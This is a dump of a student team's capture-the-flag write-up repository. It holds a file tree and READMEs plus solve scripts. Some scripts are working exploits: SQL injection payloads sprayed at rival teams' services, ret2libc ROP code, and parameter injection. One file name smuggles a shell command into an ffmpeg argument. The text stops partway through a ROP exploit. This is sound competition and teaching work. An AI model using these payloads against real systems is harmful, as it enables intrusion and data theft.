├── .all-contributorsrc ├── AD-INCTF-SECCON ├── README.md ├── masalaD │ ├── exploit.py │ └── utilities.py └── postoffice │ ├── exploit.py │ └── utilities.py ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── CSAW Quals 2020 ├── Crypto │ ├── Perfect Secrecy │ │ ├── README.md │ │ ├── image1.png │ │ ├── image2.png │ │ └── result.png │ ├── authy │ │ ├── README.md │ │ ├── handout.py │ │ └── solve.py │ └── modulus_operadi │ │ ├── README.md │ │ └── solve.py ├── Pwn │ ├── roppity │ │ ├── README.md │ │ ├── libc-2.27.so │ │ ├── rop │ │ └── solve.py │ └── slithery │ │ ├── README.md │ │ ├── blacklist.py │ │ └── sandbox.py ├── README.md ├── Rev │ ├── baby_mult │ │ ├── README.md │ │ └── program.txt │ └── not_malware │ │ ├── README.md │ │ └── not_malware └── Web │ └── flask_caching │ ├── README.md │ ├── app.py │ └── solve.py ├── CyBRICS CTF ├── CTB │ └── DockEsc │ │ └── README.md ├── Cyber │ └── Serial │ │ └── README.md ├── README.md └── Web │ ├── Gif2png │ ├── README.md │ └── csictf.gif' -vf drawtext=\"text=$(grep ffLaG main.py)\"'.gif │ └── Hunt │ └── README.md ├── CyberHome CTF ├── Cryptography │ └── Artemis │ │ ├── Artemis │ │ ├── README.md │ │ └── artemis.htm ├── README.md ├── Reverse Engineering │ ├── arg1 │ │ ├── README.md │ │ └── arg01 │ ├── arg2 │ │ ├── README.md │ │ └── arg2 │ └── lemon_zest │ │ ├── README.md │ │ └── lemon_zest.py └── Steganography │ └── 54V3_7H3_W0R1D │ ├── README.md │ └── flag.ico ├── DUCTF ├── README.md ├── crypto │ ├── babyrsa │ │ ├── README.md │ │ └── solve.py │ ├── hex-cipher-shift │ │ ├── README.md │ │ └── exploit.py │ └── rot-i │ │ └── README.md ├── forensics │ ├── i-love-scomo │ │ ├── README.md │ │ ├── ilovescomo.jpg │ │ ├── ilovescomo.jpg.out │ │ └── solve.py │ └── spot-the-difference │ │ ├── Publish.zip │ │ └── README.md └── pwn │ ├── return-to-what │ ├── README.md │ ├── libc6_2.27-3ubuntu1_amd64.so │ └── return-to-what │ └── shellthis │ ├── README.md │ └── shellthis ├── DarkCTF 2020 ├── Crypto │ ├── Duplicacy Within │ │ └── exploit.py │ ├── E-AES │ │ └── README.md │ ├── Easy RSA │ │ └── solve.py │ ├── Pipe Rhyme │ │ └── exploit.py │ ├── Weird Encryption │ │ ├── Encrypted │ │ ├── enc.py │ │ └── solve.py │ └── haxXor │ │ └── exploit.py ├── Misc │ ├── Flag of Life │ │ └── README.md │ ├── Minesweeper │ │ └── exploit.py │ └── QuickFix │ │ ├── fix.py │ │ └── show_flag.py ├── Pwn │ ├── newPaX │ │ ├── exploit.py │ │ ├── libc6-i386_2.27-3ubuntu1.2_amd64.so │ │ └── newPaX │ └── roprop │ │ ├── exploit.py │ │ ├── libc-2.27.so │ │ └── roprop ├── README.md ├── Rev │ └── Jack │ │ ├── exploit.py │ │ └── jack └── Web │ ├── Agent-U │ └── exploit.py │ ├── Apache Logs │ └── solve.js │ ├── Chain Race │ └── exploit.py │ ├── Dusty │ └── exploit.py │ ├── PHP Information │ └── exploit.py │ ├── Safe House │ └── exploit.py │ ├── So_Simple │ └── exploit.py │ └── Source │ └── exploit.py ├── Deconstruct.f ├── Forensics │ ├── Mike │ │ ├── README.md │ │ ├── desktop_wallpaper.png │ │ ├── flag.png │ │ └── stegsolve.png │ ├── Teg Rads │ │ ├── README.md │ │ ├── alexa.png │ │ ├── ctrl+a.png │ │ ├── exploit.py │ │ ├── fdp.pdf │ │ ├── p4.png │ │ ├── part1.png │ │ ├── part2.png │ │ ├── part3.png │ │ ├── part4.png │ │ ├── part5.png │ │ ├── pdf.png │ │ ├── strings1.png │ │ ├── strings2.png │ │ ├── strings3.png │ │ ├── strings4.png │ │ └── strings5.png │ └── The Missing Journalist │ │ ├── README.md │ │ ├── exiftool.png │ │ ├── flag.png │ │ ├── pdfpass.png │ │ ├── pdfpassprompt.png │ │ ├── strings.png │ │ └── the_journalist.gif ├── OSINT │ ├── AHF │ │ ├── 1.png │ │ ├── 2.png │ │ ├── README.md │ │ ├── flag.png │ │ └── team.pdf │ └── Dora the Explorer │ │ └── README.md ├── README.md ├── pwn │ ├── Reject humanity return to libc │ │ ├── Package.tar │ │ ├── README.md │ │ ├── challenge │ │ ├── dispenser_login.c │ │ ├── lib │ │ │ └── x86_64-linux-gnu │ │ │ │ └── libc-2.31.so │ │ └── solve.py │ └── destructinator │ │ └── README.md └── web │ ├── Curly Fries 1 │ └── README.md │ ├── Curly Fries 2 │ └── README.md │ ├── Curly Fries 3 │ └── README.md │ ├── Hungry Man │ ├── README.md │ └── hungry.py │ ├── gate keeper │ └── README.md │ └── taxi union │ └── README.md ├── Fword CTF ├── Miscellaneous │ ├── Secret Array │ │ └── README.md │ └── Twis Twis Little Star │ │ └── README.md ├── README.md └── Reversing │ └── Tornado │ └── README.md ├── Google CTF ├── README.md └── Web │ └── Log-Me-In │ ├── README.md │ ├── app.js │ └── solve.py ├── HSCTF 7 ├── Binary Exploitation │ └── boredom │ │ ├── README.md │ │ ├── boredom │ │ ├── boredom.c │ │ └── static │ │ ├── img1.png │ │ ├── img2.png │ │ └── img3.png ├── Miscellaneous │ └── My First Calculator │ │ ├── README.md │ │ └── calculator.py └── README.md ├── HacktivityCon CTF ├── Cryptography │ └── Tyrannosaurus Rex │ │ └── README.md ├── Mobile │ └── Mobile One │ │ ├── README.md │ │ └── mobile_one.apk ├── Pwn │ └── README.md ├── README.md ├── Scripting │ ├── Flushed │ │ └── README.md │ ├── Hashbrown Caserole │ │ └── README.md │ ├── Impartial │ │ └── README.md │ ├── Misdirection │ │ └── README.md │ ├── Prophecy │ │ └── README.md │ ├── Rescue Mission │ │ └── README.md │ └── Tootsie Pop │ │ ├── README.md │ │ └── pop.zip ├── Steganography │ ├── Chess Cheater │ │ ├── README.md │ │ └── morse.wav │ ├── Cold War │ │ ├── README.md │ │ └── cold_war.txt │ └── Spy vs. Spy │ │ ├── README.md │ │ └── spy_vs_spy.png └── Web │ └── Template Shack │ └── README.md ├── LICENSE ├── NahamCon CTF ├── Crpytography │ └── Homecooked │ │ ├── README.md │ │ ├── decrypt.py │ │ └── primes1.txt ├── README.md ├── Scripting │ └── Rotten │ │ ├── README.md │ │ └── script.py ├── Warmup │ ├── Easy Keesy │ │ ├── README.md │ │ └── easy_keesy │ └── UGGC │ │ └── README.md └── Web │ ├── Agent 95 │ └── README.md │ └── Localghost │ └── README.md ├── README.md ├── UMDCTF 2021 ├── Crypto │ └── Art Class.md ├── OSINT │ └── vacation.md ├── Programming │ └── Jay1_and_Jay2.md ├── forensics │ └── NotSlick.md └── stegnography │ └── pickle_rick.md ├── Zh3r0 CTF ├── Pwn │ ├── Command 1 │ │ ├── README.md │ │ ├── command_1 │ │ └── static │ │ │ └── img1.png │ └── Free Flag │ │ ├── README.md │ │ ├── chall │ │ └── static │ │ ├── img1.png │ │ ├── img2.png │ │ ├── img3.png │ │ └── img4.png ├── README.md ├── Reversing │ └── snakes everywhere │ │ ├── README.md │ │ ├── guess.py │ │ ├── py_dis1 │ │ ├── rev.py │ │ └── snake.txt └── Web │ └── Google Source Code │ ├── README.md │ ├── payload.php │ └── static │ ├── img1.png │ ├── img2.png │ ├── img3.png │ └── img4.png └── redpwnCTF 2020 ├── README.md ├── crypto ├── 12-shades-of-redpwn │ ├── README.md │ ├── ciphertext.jpg │ ├── color-wheel.jpg │ └── sol ├── 4k-rsa │ ├── 4k-rsa-public-key.txt │ ├── 4k-rsa.py │ └── README.md ├── base646464 │ ├── README.md │ ├── cipher.txt │ └── generate.js └── pseudo-key │ ├── README.md │ ├── crack.py │ ├── pseudo-key-output.txt │ └── pseudo-key.py ├── misc └── CaaSINO │ ├── README.md │ └── calculator.js ├── pwn ├── coffer-overflow-0 │ ├── README.md │ ├── coffer-overflow-0 │ └── coffer-overflow-0.c ├── coffer-overflow-1 │ ├── README.md │ ├── coffer-overflow-1 │ └── coffer-overflow-1.c └── coffer-overflow-2 │ ├── README.md │ ├── coffer-overflow-2 │ └── coffer-overflow-2.c ├── rev ├── bubbly │ ├── README.md │ ├── bubbly │ └── static │ │ └── img1.png └── ropes │ ├── README.md │ └── ropes └── web ├── inspector-general └── README.md ├── login ├── README.md └── static │ └── img1.png ├── panda-facts ├── README.md └── index.js ├── static-pastebin └── README.md ├── static-static-hosting └── README.md └── tux-fanpage ├── README.md └── index.js /.all-contributorsrc: -------------------------------------------------------------------------------- 1 | { 2 | "files": [ 3 | "README.md" 4 | ], 5 | "imageSize": 100, 6 | "commit": false, 7 | "contributors": [ 8 | { 9 | "login": "roerohan", 10 | "name": "Rohan Mukherjee", 11 | "avatar_url": "https://avatars0.githubusercontent.com/u/42958812?v=4", 12 | "profile": "https://github.com/roerohan", 13 | "contributions": [ 14 | "doc" 15 | ] 16 | }, 17 | { 18 | "login": "thebongy", 19 | "name": "Rishit Bansal", 20 | "avatar_url": "https://avatars1.githubusercontent.com/u/7080652?v=4", 21 | "profile": "https://github.com/thebongy", 22 | "contributions": [ 23 | "doc" 24 | ] 25 | }, 26 | { 27 | "login": "Mannan-Goyal", 28 | "name": "Mannan Goyal", 29 | "avatar_url": "https://avatars.githubusercontent.com/u/72966340?v=4", 30 | "profile": "https://github.com/Mannan-Goyal", 31 | "contributions": [ 32 | "doc" 33 | ] 34 | }, 35 | { 36 | "login": "salt57", 37 | "name": "salt57", 38 | "avatar_url": "https://avatars.githubusercontent.com/u/45989024?v=4", 39 | "profile": "https://github.com/salt57", 40 | "contributions": [ 41 | "doc" 42 | ] 43 | }, 44 | { 45 | "login": "Rakesh1772", 46 | "name": "Rakesh1772", 47 | "avatar_url": "https://avatars.githubusercontent.com/u/77398468?v=4", 48 | "profile": "https://github.com/Rakesh1772", 49 | "contributions": [ 50 | "doc" 51 | ] 52 | }, 53 | { 54 | "login": "sanjaybaskaran01", 55 | "name": "Sanjay Kumar Baskaran", 56 | "avatar_url": "https://avatars.githubusercontent.com/u/72266283?v=4", 57 | "profile": "https://www.linkedin.com/in/sanjaybaskaran", 58 | "contributions": [ 59 | "doc" 60 | ] 61 | }, 62 | { 63 | "login": "UnknownAbyss", 64 | "name": "Additya Singhal", 65 | "avatar_url": "https://avatars.githubusercontent.com/u/44570898?v=4", 66 | "profile": "https://github.com/UnknownAbyss", 67 | "contributions": [ 68 | "doc" 69 | ] 70 | } 71 | ], 72 | "contributorsPerLine": 7, 73 | "projectName": "CTF-Write-ups", 74 | "projectOwner": "csivitu", 75 | "repoType": "github", 76 | "repoHost": "https://github.com", 77 | "skipCi": true 78 | } 79 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/README.md: -------------------------------------------------------------------------------- 1 | # AD-INCTF-SECCON 2 | 3 | ## Organizers 4 | - team bi0s 5 | - CISCO 6 | 7 | Rank - 2 8 | 9 | - Official URL: http://ad.inctf.in 10 | - Format: Attack Defense 11 | - Duration: Sun, 12 Oct. 2020, 09:00 IST — Sun, 12 Oct. 2020, 21:00 IST 12 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/masalaD/exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import random 3 | import string 4 | import json 5 | from utilities import extract_flag, submit_flag 6 | 7 | s = requests.Session() 8 | host = '10.42.0.72' 9 | port = 5200 10 | 11 | url = lambda x: f'http://{host}:{port}' + x 12 | 13 | def random_string(l): 14 | return ''.join(random.choice(string.ascii_letters) for i in range(l)) 15 | 16 | 17 | def signup(name, password, email): 18 | r = s.post(url('/signup'), data={ 19 | "name": name, 20 | "password": password, 21 | "email": email, 22 | }, timeout=4) 23 | 24 | print(r.status_code) 25 | # print(r.text) 26 | return r.text 27 | 28 | 29 | def login(email, password): 30 | r = s.post(url('/login'), data= { 31 | "email": email, 32 | "password": password, 33 | }, timeout=4) 34 | 35 | # print(r.text) 36 | return r.text 37 | 38 | 39 | def get_show_cart(): 40 | r = s.get(url('/show_cart'), timeout=4) 41 | 42 | return r.text 43 | 44 | 45 | teams = json.load(open('teamlist.json'))[::-1][6:] 46 | for team in teams: 47 | try: 48 | host = team['ip'] 49 | print(f'Exploiting team {team["name"]} for {url("/")}') 50 | name = "' or 1=1 -- " 51 | password = random_string(10) 52 | email = random_string(10) 53 | signup(name, password, email) 54 | login(email, password) 55 | x = get_show_cart() 56 | 57 | flags = extract_flag(x) 58 | print(flags) 59 | 60 | submit_flag(flags) 61 | except Exception: 62 | print(f'Failed for {team["name"]}') 63 | 64 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/masalaD/utilities.py: -------------------------------------------------------------------------------- 1 | from pwn import remote 2 | import time 3 | import re 4 | import os 5 | 6 | def extract_flag(text): 7 | return re.findall(r'bi0s\{\w{26}\}', text) 8 | 9 | def submit_flag(flag, host='10.40.0.2', port=5555): 10 | if isinstance(flag, list): 11 | flag = '\n'.join(flag) 12 | 13 | print(f'[INFO] Submitting flag {flag} to {host}:{port}.') 14 | 15 | r = remote(host, port) 16 | r.sendline(flag) 17 | 18 | if '\n' in flag: 19 | for _ in range(len(flag.split('\n'))): 20 | print(r.recvline()) 21 | else: 22 | print(r.recvline()) 23 | 24 | r.close() 25 | 26 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/postoffice/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from utilities import extract_flag, submit_flag 3 | import json 4 | import threading 5 | 6 | port = 8080 7 | 8 | def random_string(l): 9 | return ''.join(random.choice(string.ascii_letters) for i in range(l)) 10 | 11 | 12 | def register(username, email, password, host): 13 | r = remote(host, port, level='error') 14 | 15 | 16 | r.sendline('1') 17 | 18 | print(r.recvuntil('Username: ').decode()) 19 | 20 | r.sendline(username) 21 | 22 | print(r.recvuntil('Email: ').decode()) 23 | 24 | r.sendline(email) 25 | 26 | print(r.recvuntil('Password:').decode()) 27 | r.sendline(password) 28 | 29 | r.close() 30 | 31 | def admin_stuff(host): 32 | r = remote(host, port, level='error') 33 | 34 | print('\n\n DOING ADMIN STUFF \n\n') 35 | 36 | print(r.recvuntil('Your choice(1-2): ').decode()) 37 | r.sendline('2') 38 | 39 | print(r.recvuntil('Email: ').decode()) 40 | 41 | r.sendline('admin@gmail.com') 42 | 43 | print(r.recvuntil('Password: ').decode()) 44 | r.sendline('adminpassword') 45 | 46 | x = r.recvall().decode().strip().split('\n')[2:] 47 | return x 48 | 49 | def exploit(email, password, token, host): 50 | r = remote(host, port, level='error') 51 | 52 | print('\n\n DOING EXPLOIT \n\n') 53 | 54 | 55 | r.recvuntil('Your choice(1-2): ').decode() 56 | r.sendline('2') 57 | 58 | r.recvuntil('Email: ').decode() 59 | 60 | r.sendline(email) 61 | 62 | r.recvuntil('Password: ').decode() 63 | r.sendline(password) 64 | 65 | 66 | r.recvuntil('Your choice(1-3): ').decode() 67 | r.sendline('2') 68 | 69 | r.sendline(token) 70 | text = r.recvall().decode() 71 | 72 | flags = extract_flag(text) 73 | r.close() 74 | 75 | print(f'GOT FLAG {flags[0]}\n\n\n') 76 | 77 | print(host) 78 | 79 | return flags 80 | 81 | teams = json.load(open('teamlist.json')) 82 | 83 | used_tokens = {} 84 | 85 | def exploit_team(): 86 | while True: 87 | if len(teams) == 0: 88 | return 89 | else: 90 | team = teams.pop() 91 | try: 92 | host = team['ip'] 93 | 94 | username = random_string(10) 95 | email = username + '@gmail.com' 96 | password = random_string(10) 97 | register(username, email, password, host) 98 | tokens = admin_stuff(host) 99 | 100 | if not used_tokens.get(team['ip']): 101 | used_tokens[team['ip']] = {} 102 | 103 | for token in tokens: 104 | if token not in used_tokens[team['ip']]: 105 | used_tokens[team['ip']][token] = exploit(email, password, token, host)[0] 106 | 107 | print(f'\n\n\n\n\n\nSUBMITTING FOR TEAM {team}\n\n\n\n\n\n') 108 | 109 | submit_flag(list(used_tokens[team['ip']].values())) 110 | 111 | 112 | except Exception: 113 | print(f'Failed for {team["name"]}') 114 | 115 | 116 | jobs = [] 117 | 118 | for i in range(10): 119 | x = threading.Thread(target=exploit_team) 120 | jobs.append(x) 121 | x.start() 122 | 123 | for job in jobs: 124 | job.join() 125 | 126 | -------------------------------------------------------------------------------- /AD-INCTF-SECCON/postoffice/utilities.py: -------------------------------------------------------------------------------- 1 | from pwn import remote 2 | import time 3 | import re 4 | import os 5 | 6 | def extract_flag(text): 7 | return re.findall(r'bi0s\{\w{26}\}', text) 8 | 9 | def submit_flag(flag, host='10.40.0.2', port=5555): 10 | if isinstance(flag, list): 11 | flag = '\n'.join(flag) 12 | 13 | print(f'[INFO] Submitting flag {flag} to {host}:{port}.') 14 | 15 | r = remote(host, port) 16 | r.sendline(flag) 17 | 18 | if '\n' in flag: 19 | for _ in range(len(flag.split('\n'))): 20 | print(r.recvline()) 21 | else: 22 | print(r.recvline()) 23 | 24 | r.close() 25 | 26 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | Thanks for contributing! :smile: 4 | 5 | The following is a set of guidelines for contributing. These are mostly guidelines, not rules. Use your best judgment, and feel free to propose changes to this document in a pull request. 6 | 7 | > Note: Contributions should be made via pull requests to the dev branch of the repository. 8 | 9 | ## Table of Contents 10 | 11 | 1. [Styleguides](#styleguides) 12 | 2. [What should I know before I get started?](#what-should-i-know-before-i-get-started) 13 | 3. [How Can I contribute?](#how-can-i-contribute) 14 | 15 | # Guidelines 16 | The following are the guidelines we request you to follow in order to contribute to this project. 17 | 18 | ## Styleguides 19 | 20 | ### Commit Messages 21 | 22 | The commit messages should follow the following pattern: 23 | ```bash 24 | feat: Description # if a new feature is added 25 | fix: Description # if a bug is fixed 26 | refactor: Description # if code is refactored 27 | docs: Description # if documentation is added 28 | lint: Description # if a lint issue is fixed 29 | ``` 30 | ### Issues 31 | 32 | ```bash 33 | update: Description # if an update is required for a feature 34 | bug: Description # if there is a bug in a particular feature 35 | suggestion: Description # if you want to suggest a better way to implement a feature 36 | ``` 37 | ### Code Styleguide 38 | The code should satisfy the following: 39 | - Have meaningful variable names, either in `snake_case` or `camelCase`. 40 | - Have no `lint` issues. 41 | - Have meaningful file names, directory names and directory structure. 42 | - Have a scope for easy fixing, refactoring and scaling. 43 | 44 | ### Pull Requests 45 | Pull requests should have: 46 | - A concise commit message. 47 | - A description of what was changed/added. 48 | 49 | ## What should I know before I get started 50 | You can contribute to any of the features you want, here's what you need to know: 51 | - How the project works. 52 | - The technology stack used for the project. 53 | - A brief idea about writing documentation. 54 | 55 | ## How Can I Contribute 56 | 57 | You can contribute by: 58 | - Reporting Bugs 59 | - Suggesting Enhancements 60 | - Code Contribution 61 | - Pull Requests 62 | 63 | Make sure to document the contributions well in the pull request. 64 | 65 | > It is not compulsory to follow the guidelines mentioned above, but it is strongly recommended. -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/Perfect Secrecy/README.md: -------------------------------------------------------------------------------- 1 | # Perfect Secrecy 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | - [image1.png](./image1.png) 12 | - [image2.png](./image2.png) 13 | 14 | ``` 15 | Alice sent over a couple of images with sensitive information to Bob, encrypted with a pre-shared key. It is the most secure encryption scheme, theoretically... 16 | ``` 17 | 18 | # Exploitation 19 | 20 | This challenge took a bit of guessing, but if you XOR every pixel from `image1` with every pixel from `image2` and save that image, you get the [result.png](./result.png) image which has a base64 string that can be decoded to get the flag. 21 |
22 | 23 | You can get the image using: 24 | 25 | ```py 26 | from PIL import Image 27 | import numpy as np 28 | 29 | def read_image(imPath): 30 | im = Image.open(imPath) 31 | 32 | pix_val = list(map(lambda x: int(x != 0), im.getdata())) 33 | return pix_val 34 | 35 | data1 = read_image('image1.png') 36 | data2 = read_image('image2.png') 37 | 38 | res = [None] * len(data1) 39 | 40 | for i in range(len(res)): 41 | if data1[i] ^ data2[i] == 1: 42 | res[i] = 1 43 | else: 44 | res[i] = 0 45 | 46 | array = np.array(res, dtype=np.uint8) 47 | im = np.reshape(array,(256,256)) 48 | 49 | img = Image.fromarray(np.uint8(im * 255) , 'L') 50 | img.save('./result.png') 51 | 52 | print('Written successfully.') 53 | 54 | """ 55 | echo ZmxhZ3swbjNfdDFtM19QQGQhfQ== | base64 -d 56 | flag{0n3_t1m3_P@d!} 57 | """ 58 | ``` 59 | 60 | Once you get this, you can decode the base64 string with the help of `base64` in linux. 61 | 62 | ```bash 63 | echo ZmxhZ3swbjNfdDFtM19QQGQhfQ== | base64 -d 64 | flag{0n3_t1m3_P@d!} 65 | ``` 66 | 67 | The flag is: 68 | 69 | ``` 70 | flag{0n3_t1m3_P@d!} 71 | ``` 72 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/Perfect Secrecy/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Crypto/Perfect Secrecy/image1.png -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/Perfect Secrecy/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Crypto/Perfect Secrecy/image2.png -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/Perfect Secrecy/result.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/CSAW Quals 2020/Crypto/Perfect Secrecy/result.png -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/authy/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import base64 3 | 4 | local = False 5 | 6 | url = lambda x: "http://crypto.chal.csaw.io:5003" + x 7 | 8 | if local: 9 | url = lambda x: "http://localhost:5000" + x 10 | 11 | 12 | def view(id, integrity): 13 | print(f"\n\nSending id={id}, integrity={integrity}\n\n") 14 | r = requests.post( 15 | url("/view"), 16 | data={ 17 | "id": id, 18 | "integrity": integrity, 19 | }, 20 | ) 21 | 22 | print("\n\n") 23 | print(r.text) 24 | return r.text 25 | 26 | 27 | data = { 28 | "entrynum": 7, 29 | "author": "&admin=True", 30 | "note": "&access_sensitive=True&entrynum=7", 31 | } 32 | 33 | r = requests.post(url("/new"), data=data) 34 | 35 | encoded, hexdigest = r.text.strip().split(":") 36 | encoded = encoded.split('Successfully added ')[1] 37 | 38 | print("Encoded: " + encoded) 39 | print("Hexdigest: " + hexdigest) 40 | 41 | flag = view(encoded, hexdigest) 42 | 43 | ''' 44 | flag{h4ck_th3_h4sh} 45 | ''' -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/modulus_operadi/README.md: -------------------------------------------------------------------------------- 1 | # modulus_operandi 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ``` 12 | Can't play CSAW without your favorite block cipher! 13 | 14 | nc crypto.chal.csaw.io 5001 15 | ``` 16 | 17 | # Exploitation 18 | 19 | The exploit is based on the fact that the ciphertext generated using ECB will have repeating blocks because of the way it works, while CBC will not have such blocks. 20 |
21 | 22 | The following script can be used to get the flag. 23 | 24 | ```py 25 | from pwn import remote 26 | 27 | l = [] 28 | 29 | def connect(): 30 | r = remote('crypto.chal.csaw.io', 5001) 31 | 32 | print(r.recvuntil('\n').decode()) 33 | 34 | return r 35 | 36 | 37 | def send(r, x): 38 | r.sendline(x) 39 | print(x) 40 | 41 | 42 | def run(r): 43 | x = r.clean() 44 | print(x) # Enter plaintext 45 | 46 | send(r, 'a' * 64) 47 | 48 | print(r.recvuntil('Ciphertext is: ')) 49 | x = r.recvline().decode() # Ciphertext value 50 | print(x) 51 | 52 | if x[0:32] == x[32:64]: 53 | mode = 'ECB' 54 | l.append(0) 55 | else: 56 | mode = 'CBC' 57 | l.append(1) 58 | 59 | print(r.recvline()) # ECB or CBC 60 | 61 | send(r, mode) 62 | 63 | 64 | 65 | def solve(): 66 | r = connect() 67 | 68 | i = 0 69 | while True: 70 | try: 71 | run(r) 72 | except: 73 | print(i) 74 | print(r.recvall()) 75 | print(l) 76 | exit(1) 77 | i+=1 78 | 79 | r.interactive() 80 | 81 | solve() 82 | 83 | ''' 84 | [0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1] 85 | ''' 86 | ``` 87 | 88 | In this list, ECB is 0 and CBC is 1. You can then group these into 8 and treat them as binary to get the flag. 89 | 90 | ```py 91 | >>> ''.join([chr(int(''.join(map(str, l[0+i:8+i])), 2)) for i in range(0, len(l 92 | ), 8)]) 93 | 'flag{ECB_re@lly_sUck$}' 94 | ``` 95 | -------------------------------------------------------------------------------- /CSAW Quals 2020/Crypto/modulus_operadi/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import remote 2 | 3 | l = [] 4 | 5 | def connect(): 6 | r = remote('crypto.chal.csaw.io', 5001) 7 | 8 | print(r.recvuntil('\n').decode()) 9 | 10 | return r 11 | 12 | 13 | def send(r, x): 14 | r.sendline(x) 15 | print(x) 16 | 17 | 18 | def run(r): 19 | x = r.clean() 20 | print(x) # Enter plaintext 21 | 22 | send(r, 'a' * 64) 23 | 24 | print(r.recvuntil('Ciphertext is: ')) 25 | x = r.recvline().decode() # Ciphertext value 26 | print(x) 27 | 28 | if x[0:32] == x[32:64]: 29 | mode = 'ECB' 30 | l.append(0) 31 | else: 32 | mode = 'CBC' 33 | l.append(1) 34 | 35 | print(r.recvline()) # ECB or CBC 36 | 37 | send(r, mode) 38 | 39 | 40 | 41 | def solve(): 42 | r = connect() 43 | 44 | i = 0 45 | while True: 46 | try: 47 | run(r) 48 | except: 49 | print(i) 50 | print(r.recvall()) 51 | print(l) 52 | exit(1) 53 | i+=1 54 | 55 | r.interactive() 56 | 57 | solve() 58 | 59 | ''' 60 | [0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1] 61 | ''' -------------------------------------------------------------------------------- /CSAW Quals 2020/Pwn/roppity/README.md: -------------------------------------------------------------------------------- 1 | # roppity 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | - Pwntools 9 | 10 | # Source 11 | 12 | - [roppity](./roppity) 13 | 14 | ``` 15 | Welcome to pwn! 16 | 17 | nc pwn.chal.csaw.io 5016 18 | ``` 19 | 20 | # Exploitation 21 | 22 | This is a ret2libc challenge, where you have to overflow the stack using the `gets` function. Here's a script to do the same. 23 | 24 | ```py 25 | from pwn import * 26 | 27 | elf = ELF('./rop') 28 | rop = ROP(elf) 29 | 30 | local = False 31 | 32 | host = 'pwn.chal.csaw.io' 33 | port = 5016 34 | 35 | if local: 36 | p = elf.process() 37 | libc = ELF('/usr/lib/libc.so.6') 38 | else: 39 | p = remote(host, port) 40 | libc = ELF('./libc-2.27.so') 41 | 42 | 43 | PUTS_PLT = elf.plt['puts'] 44 | MAIN_PLT = elf.symbols['main'] 45 | 46 | # Same as ROPgadget --binary ./rop | grep "pop rdi" 47 | POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0] 48 | RET = rop.find_gadget(['ret'])[0] 49 | 50 | OFFSET = b'A' * (0x20 + 0x8) 51 | 52 | 53 | log.info("puts@plt: " + hex(PUTS_PLT)) 54 | log.info('main@plt: ' + hex(MAIN_PLT)) 55 | log.info("pop rdi; ret; gadget: " + hex(POP_RDI)) 56 | 57 | 58 | def get_addr(func_name): 59 | FUNC_GOT = elf.got[func_name] 60 | log.info(func_name + ' GOT @ ' + hex(FUNC_GOT)) 61 | 62 | rop_chain = [ 63 